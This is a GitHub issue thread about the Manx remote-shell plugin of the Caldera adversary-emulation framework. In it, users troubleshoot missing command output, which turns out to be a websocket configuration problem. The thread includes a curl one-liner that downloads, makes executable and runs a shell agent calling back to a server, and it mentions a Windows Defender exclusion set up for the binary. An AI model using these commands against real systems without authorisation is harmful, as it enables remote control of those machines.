### ISSUE TITLE
Cannot Execute or Retrieve Execution Output

### ISSUE THREAD

**Issue by Cyb3rWard0g** [mitre/manx#12]
Good evening Manx Team,

I tried the plugin today and I do not know if I am running it correctly, but either by typing commands or using the drop-down menu options, I do not get any output. 

<img width="1439" alt="image" src="https://user-images.githubusercontent.com/9653181/79096881-54070280-7d2c-11ea-953c-f8ce5a4af592.png">

I do have a Windows Defender exclusion on folder `C:\users\` for the binary

<img width="1394" alt="image" src="https://user-images.githubusercontent.com/9653181/79096640-bc091900-7d2b-11ea-83f9-901fbb5e14be.png">

<img width="1440" alt="image" src="https://user-images.githubusercontent.com/9653181/79096673-d216d980-7d2b-11ea-9d0f-b51f134b6291.png">

Running Agent on Win10 Build 18363 . 

Thank you in advance for your time :)

**Comment by khyberspache** [comment]
Are you getting any bugs in the Javascript console on the web UI?

**Comment by khyberspache** [comment]
Also, can you start the agent with this command then try to run a task/command from the UI:
```powershell
C:\Users\Public\$name.exe -socket $socket -http $server -contact tcp -v;
```

**Comment by Cyb3rWard0g** [comment]
I will do that and let you know. Thank you! :)

**Comment by Cyb3rWard0g** [comment]
I will get to this this weekend. Sorry for the delay. I have been a little busy at work.

**Comment by propriacausa** [comment]
Hello,

I have the same issue as Cyb3rWard0g. I was able to reproduce this on a Ubuntu system:
`server="http://0.0.0.0:8888";socket="0.0.0.0:7010";contact="tcp";curl -s -X POST -H "file:manx.go" -H "platform:linux" $server/file/download > manx.go;chmod +x manx.go;./manx.go -http $server -socket $socket -contact $contact -v
[*] tcp outbound socket 0.0.0.0:7010, inbound at 6000
[+] TCP established for chdhbb`
I have launched the Manx client on the system where the Caldera server runs to exclude any network issues and the session appears within the Manx plugin. But when I insert any command in the terminal window of the Manx plugin no more output is generated on the client.
I also took a look into the Javascript console and I have found this error message when I try to connect to a session:
`WebSocket connection to 'ws://0.0.0.0:7012/manx/669246' failed: Error in connection establishment: net::ERR_CONNECTION_REFUSED
runCommand | @ | manxterm.js:102
-- | -- | --
  | eval | @ | manxterm.js:15
  | e.fire | @ | VM22:1
  | eval | @ | VM22:1
  | e.fire | @ | VM22:1
  | e.triggerDataEvent | @ | VM22:1
  | t._keyDown | @ | VM22:1
  | eval | @ | VM22:1
`
I hope this helps you somehow.

Thank you very much for your great contribution to the infosec community!

**Comment by propriacausa** [comment]
This error does not occur once you have configured your global variables like "app.contact.websocket". When you have set those to the real IP of the Caldera server the Manx plugin's terminal will work.
